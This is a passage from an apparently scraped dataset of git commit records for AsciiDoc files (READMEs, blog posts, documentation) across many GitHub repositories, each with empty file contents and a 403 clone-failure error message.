icsearch,vroyer\/elassandra,nezirus\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,shreejay\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,coding0011\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,fred84\/elasticsearch,jimczi\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,winstonewert\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,robin13\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,wenpos\/elasticsearch,mjason3\/elasticsearch,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,masaruh\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,LeoYao\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,vroyer\/elasticassandra,wangtuo\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elasticassandra,markwalkom\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,fred84\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,coding0011\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,umeshdangat\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,lks21c\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,glefloch\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,alexshadow007\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/getting-started.asciidoc","new_file":"docs\/reference\/getting-started.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85784b8b0dc6fe33e532d84a5d789b6c60871a78","subject":"Update 2018-06-04-php-Documentor.adoc","message":"Update 2018-06-04-php-Documentor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-04-php-Documentor.adoc","new_file":"_posts\/2018-06-04-php-Documentor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f029379e6df334d41deeca25bd186ce5c652c9f","subject":"Update 2018-09-24-Time-for-Class.adoc","message":"Update 2018-09-24-Time-for-Class.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_file":"_posts\/2018-09-24-Time-for-Class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10fb4377454631fa56f3ba8ddced5f16b7d7252d","subject":"tep-1001: Add commodities and currencies links","message":"tep-1001: Add commodities and currencies links\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/readme.adoc","new_file":"docs\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfab994c62025fcc1863539cfd782ce74ec6ac83","subject":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","message":"Update 2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_file":"_posts\/2017-12-25-A-W-S-re-Invent2017-E-X-P-O.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a25aa1d91dc29659d7fa1dfea972018642bd5b0","subject":"Added Camel 2.20.4 release notes to docs","message":"Added Camel 2.20.4 release notes to docs\n","repos":"christophd\/camel,punkhorn\/camel-upstream,tdiesler\/camel,kevinearls\/camel,tadayosi\/camel,sverkera\/camel,anoordover\/camel,pmoerenhout\/camel,mcollovati\/camel,zregvart\/camel,alvinkwekel\/camel,zregvart\/camel,apache\/camel,kevinearls\/camel,nikhilvibhav\/camel,onders86\/camel,nikhilvibhav\/camel,sverkera\/camel,jamesnetherton\/camel,pax95\/camel,davidkarlsen\/camel,jamesnetherton\/camel,gnodet\/camel,anoordover\/camel,ullgren\/camel,pmoerenhout\/camel,tdiesler\/camel,kevinearls\/camel,mcollovati\/camel,Fabryprog\/camel,ullgren\/camel,punkhorn\/camel-upstream,pax95\/camel,cunningt\/camel,Fabryprog\/camel,objectiser\/camel,nicolaferraro\/camel,onders86\/camel,adessaigne\/camel,CodeSmell\/camel,alvinkwekel\/camel,nicolaferraro\/camel,adessaigne\/camel,DariusX\/camel,objectiser\/camel,kevinearls\/camel,jamesnetherton\/camel,punkhorn\/camel-upstream,DariusX\/camel,tadayosi\/camel,objectiser\/camel,gnodet\/camel,sverkera\/camel,pmoerenhout\/camel,cunningt\/camel,gnodet\/camel,anoordover\/camel,sverkera\/camel,alvinkwekel\/camel,cunningt\/camel,ullgren\/camel,apache\/camel,adessaigne\/camel,cunningt\/camel,adessaigne\/camel,onders86\/camel,tdiesler\/camel,gnodet\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,jamesnetherton\/camel,zregvart\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,pax95\/camel,onders86\/camel,mcollovati\/camel,anoordover\/camel,mcollovati\/camel,christophd\/camel,christophd\/camel,pmoerenhout\/camel,sverkera\/camel,kevinearls\/camel,pax95\/camel,objectiser\/camel,alvinkwekel\/camel,tadayosi\/camel,DariusX\/camel,Fabryprog\/camel,DariusX\/camel,sverkera\/camel,christophd\/camel,CodeSmell\/camel,tdiesler\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,ullgren\/camel,pax95\/camel,anoordover\/camel,davidkarlsen\/camel,kevinearls\/camel,cunningt\/camel,pmoerenhout\/camel,gnodet\/camel,CodeSmell\/camel,christophd\/camel,nikhilvibhav\/camel,CodeSmell\/camel,davidkarlsen\/camel,apache\/camel,Fabryprog\/camel,pmoerenhout\/camel,onders86\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,anoordover\/camel,apache\/camel,jamesnetherton\/camel,zregvart\/camel,onders86\/camel,adessaigne\/camel,davidkarlsen\/camel,jamesnetherton\/camel,apache\/camel,apache\/camel,nicolaferraro\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2204-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2204-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"931fb6b34fb9f075181ee71b1c31592cbdfe73c7","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79641f4d4004b31742af04606097d2a0dc9acb9d","subject":"Update 2017-02-28-Document-Title.adoc","message":"Update 2017-02-28-Document-Title.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-02-28-Document-Title.adoc","new_file":"_posts\/2017-02-28-Document-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"304ff0fe58ca47e5f378cb2a946734d748a52107","subject":"y2b create post Have I Finally Found The Ultimate Keyboard?","message":"y2b create post Have I Finally Found The Ultimate Keyboard?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-04-Have-I-Finally-Found-The-Ultimate-Keyboard.adoc","new_file":"_posts\/2017-03-04-Have-I-Finally-Found-The-Ultimate-Keyboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"241e45032d2081a7cbf0b29cebad561376d4c878","subject":"[README] Add SARTRE in the success story.","message":"[README] Add SARTRE in the success story.","repos":"DevFactory\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,tpiotrow\/afc,tpiotrow\/afc,DevFactory\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc,DevFactory\/afc,gallandarakhneorg\/afc,tpiotrow\/afc,DevFactory\/afc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tpiotrow\/afc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3574bcf91bf1ae5ef1f485a3aef03435e6c0642c","subject":"Problem: grammar could do with a bit of polish","message":"Problem: grammar could do with a bit of polish\n\nSolution: abbreviate and include docs for nix users\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6151e8641f667023e091f1f80af88c492eb275ff","subject":"fixed stupid mistake about README","message":"fixed stupid mistake about README\n","repos":"BakaBBQ\/lunautils","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BakaBBQ\/lunautils.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"6be7ad3ca24131517499a43397d98d5c20831401","subject":"Added a README.adoc.","message":"Added a README.adoc.\n","repos":"SBuild-org\/sbuild-eclipse-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SBuild-org\/sbuild-eclipse-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a7306100f3956a9227c55e1028943d3231b59b5","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"54a7b2b4307869cf0c06cc174efdf874fe9c074d","subject":"First draft of a new index page for the documentation","message":"First draft of a new index page for the documentation\n","repos":"jsight\/rewrite,chkal\/rewrite,chkal\/rewrite,jsight\/rewrite,jsight\/rewrite,jsight\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,jsight\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,chkal\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite,ocpsoft\/rewrite","old_file":"documentation\/src\/main\/asciidoc\/index-new.asciidoc","new_file":"documentation\/src\/main\/asciidoc\/index-new.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsight\/rewrite.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d3b9c59019047b52f5f0dc91f4d7a7cb4a09024","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud-incubator\/spring-cloud-kubernetes","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud-incubator\/spring-cloud-kubernetes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b281dd69c96636c8a51388b0f6436d0265ad3a33","subject":"Publish 1993-1-1-Puzzle-8-Matrix.adoc","message":"Publish 1993-1-1-Puzzle-8-Matrix.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"1993-1-1-Puzzle-8-Matrix.adoc","new_file":"1993-1-1-Puzzle-8-Matrix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf4d8ba240b34ff30a0db43cb0cb6ce751dc70dc","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fd21e02cfed290d5dbaa17d31419ec7a7833d2b","subject":"Update 2015-09-04-Turing-Machine.adoc","message":"Update 2015-09-04-Turing-Machine.adoc","repos":"glitched01\/glitched01.github.io,glitched01\/glitched01.github.io,glitched01\/glitched01.github.io","old_file":"_posts\/2015-09-04-Turing-Machine.adoc","new_file":"_posts\/2015-09-04-Turing-Machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/glitched01\/glitched01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0339de32ffee92fdde4a233f2728dc6997c6527a","subject":"CL: Fast JSON lib","message":"CL: Fast JSON lib\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"fb4d6641c9dfea042a31af882484cf03899576e6","subject":"added a README placeholder","message":"added a README placeholder\n","repos":"sgsfak\/mypixpdq,sgsfak\/mypixpdq,sgsfak\/mypixpdq","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgsfak\/mypixpdq.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7540a607a7b75db5609ac45da37c9e3497dbd6a0","subject":"Added build badge","message":"Added build badge\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91bc05df8b04518fa4852245586dd2cccedb4ddd","subject":"added readme","message":"added readme\n","repos":"cocagne\/zpax,tempbottle\/zpax","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tempbottle\/zpax.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5243576503dcbe074b2160fa08c853624422b71","subject":"Update 2016-10-21-SVGs-and-such.adoc","message":"Update 2016-10-21-SVGs-and-such.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2016-10-21-SVGs-and-such.adoc","new_file":"_posts\/2016-10-21-SVGs-and-such.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"adf350b9f30383a8ea7147f8c78f29f34ecba80e","subject":"Update 2017-04-20-My-first-post.adoc","message":"Update 2017-04-20-My-first-post.adoc","repos":"demo-hubpress\/demo,demo-hubpress\/demo,demo-hubpress\/demo,demo-hubpress\/demo","old_file":"_posts\/2017-04-20-My-first-post.adoc","new_file":"_posts\/2017-04-20-My-first-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"61f1cc760b26e3df3f8138c70ea7a74951f3c12b","subject":"Delete the file at '_posts\/2017-08-23-Your-Blog-title.adoc'","message":"Delete the file at '_posts\/2017-08-23-Your-Blog-title.adoc'","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_file":"_posts\/2017-08-23-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38cb4630aebce480bba4895cdda9031ccadcce2f","subject":"Update 2019-03-12-A-B-Java-Script.adoc","message":"Update 2019-03-12-A-B-Java-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_file":"_posts\/2019-03-12-A-B-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18fb248f3d772e93ad5fc111bc5508e909d656f3","subject":"fixed the jar name in the installation (#35)","message":"fixed the jar name in the installation (#35)\n\nalternatively could have changed the version in the pom.xml file","repos":"neo4j-graphql\/neo4j-graphql,neo4j-graphql\/neo4j-graphql,GraphGrid\/neo4j-graphql,GraphGrid\/neo4j-graphql","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-graphql\/neo4j-graphql.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96d1c00194f30c5951be6bcebf98bfb79b107616","subject":"Update 2016-08-16-Hubpress.adoc","message":"Update 2016-08-16-Hubpress.adoc","repos":"sanctumware\/hubpress,sanctumware\/hubpress,sanctumware\/hubpress,sanctumware\/hubpress","old_file":"_posts\/2016-08-16-Hubpress.adoc","new_file":"_posts\/2016-08-16-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sanctumware\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4291a858e92bbace93a8fea48a232b5591857983","subject":"Minor fixes","message":"Minor fixes\n","repos":"EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST,EMCWorld\/2015-REST","old_file":"lab\/lab.adoc","new_file":"lab\/lab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMCWorld\/2015-REST.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0a5095c7c081a3164301cfb0a794bcfb89666aa","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acd06927b60b264fae223504482295ad1474c158","subject":"module-smart_stringencoders.adoc: Adding documentation for ibmod_smart_stringencoders. RNS-1315.","message":"module-smart_stringencoders.adoc: Adding documentation for ibmod_smart_stringencoders. RNS-1315.\n","repos":"ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,b1v1r\/ironbee,ironbee\/ironbee,ironbee\/ironbee,ironbee\/ironbee,b1v1r\/ironbee","old_file":"docs\/reference-manual\/module-smart_stringencoders.adoc","new_file":"docs\/reference-manual\/module-smart_stringencoders.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/b1v1r\/ironbee.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"567668b76be0d3f3fd97519e8d047b56472f7ca6","subject":"Update 2017-06-08-shortage.adoc","message":"Update 2017-06-08-shortage.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-06-08-shortage.adoc","new_file":"_posts\/2017-06-08-shortage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a0033527209240ac0f8eac142bdbe09fa5d170d","subject":"Update 2015-10-25-Curso-de-Email-Marketing-de-Rackcode-or-Introduccion.adoc","message":"Update 2015-10-25-Curso-de-Email-Marketing-de-Rackcode-or-Introduccion.adoc","repos":"Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io","old_file":"_posts\/2015-10-25-Curso-de-Email-Marketing-de-Rackcode-or-Introduccion.adoc","new_file":"_posts\/2015-10-25-Curso-de-Email-Marketing-de-Rackcode-or-Introduccion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0389273ea0f7a52c899d3b3f38c8acb829df0d18","subject":"Update 2016-10-10-Interfacing-with-MATLAB-Real-Time-HD-Video-Streaming.adoc","message":"Update 2016-10-10-Interfacing-with-MATLAB-Real-Time-HD-Video-Streaming.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2016-10-10-Interfacing-with-MATLAB-Real-Time-HD-Video-Streaming.adoc","new_file":"_posts\/2016-10-10-Interfacing-with-MATLAB-Real-Time-HD-Video-Streaming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c8520f76b021255a7b738837ecd300fcfdc157d","subject":"Add a small sample of `gobin` failing","message":"Add a small sample of `gobin` failing\n","repos":"joyent\/rfd,davepacheco\/rfd,davepacheco\/rfd,davepacheco\/rfd,melloc\/rfd,joyent\/rfd,joyent\/rfd,melloc\/rfd,melloc\/rfd,joyent\/rfd,davepacheco\/rfd,davepacheco\/rfd","old_file":"rfd\/0106\/README.adoc","new_file":"rfd\/0106\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joyent\/rfd.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"d9f532842c3d64118c6989b80ff77c2f613330d0","subject":"Update 2017-03-31-Google-Apps-Script.adoc","message":"Update 2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf14b08b05e207cdc1b951361516d3379e66f827","subject":"Update 2018-10-15-Firebase-Firestore.adoc","message":"Update 2018-10-15-Firebase-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_file":"_posts\/2018-10-15-Firebase-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b99882c39ab893b17a4f2b4ff24d39128c7a828b","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 